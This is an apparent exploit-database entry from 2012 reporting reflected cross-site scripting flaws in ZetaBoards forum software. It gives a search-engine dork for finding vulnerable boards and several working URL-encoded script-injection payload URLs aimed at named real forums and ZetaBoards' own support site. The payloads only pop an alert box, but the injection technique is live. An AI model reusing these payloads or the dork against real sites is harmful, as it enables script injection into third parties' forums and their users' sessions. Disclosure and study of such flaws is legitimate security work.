ZetaBoards Cross Site Scripting

2012.03.08
Credit: Sony
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: intext:Hosted for free by ZetaBoards

# Exploit Title: ZetaBoards Cross Site Scripting # Date: 6.03.2012 # Author: Sony # Software Link: http://www.zetaboards.com/ # Google Dorks: intext:Hosted for free by ZetaBoards # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/03/zetaboards-cross-site-scripting.html .................................................................. Well, we have a multiple cross site scripting vulnerabilities on ZetaBoards. Who use ZetaBoards? http://www.zetaboards.com/directory/ The ZetaBoards Forum Directory contains 55,882 boards. (c) Demo: http://if.invisionfree.com/index/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://4.bp.blogspot.com/-hNc74z9U8Ak/T1ZYo20Qi5I/AAAAAAAAAsU/FvA7uSkQ1E4/s1600/forum2.JPG http://nintendo-forums.com/calendar/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://2.bp.blogspot.com/-ny-FA_k5lIQ/T1ZY0NiZjOI/AAAAAAAAAsg/Wu1dk3V5QFg/s1600/forum1.JPG http://support.zetaboards.com/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://2.bp.blogspot.com/--2qVcuCeRy0/T1ZZAgL3hPI/AAAAAAAAAss/G6N1fFs29OI/s1600/forum3.JPG http://support.zetaboards.com/login/lostpw/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://4.bp.blogspot.com/-SOIbojMMsyE/T1ZZOtjJCII/AAAAAAAAAs4/3D_Mpe3Pm-Q/s1600/forum4.JPG http://sonicblast.org/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://2.bp.blogspot.com/-zA3ibj72U9E/T1ZZbE7F5xI/AAAAAAAAAtE/w74HmHtYaU8/s1600/forum5.JPG Video: http://www.youtube.com/watch?v=ZGvwY9z3ZYA .................................................................. InSecurity.Ro Because we care, we're security aware!

References:

http://st2tea.blogspot.com/2012/03/zetaboards-cross-site-scripting.html
http://www.youtube.com/watch?v=ZGvwY9z3ZYA


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top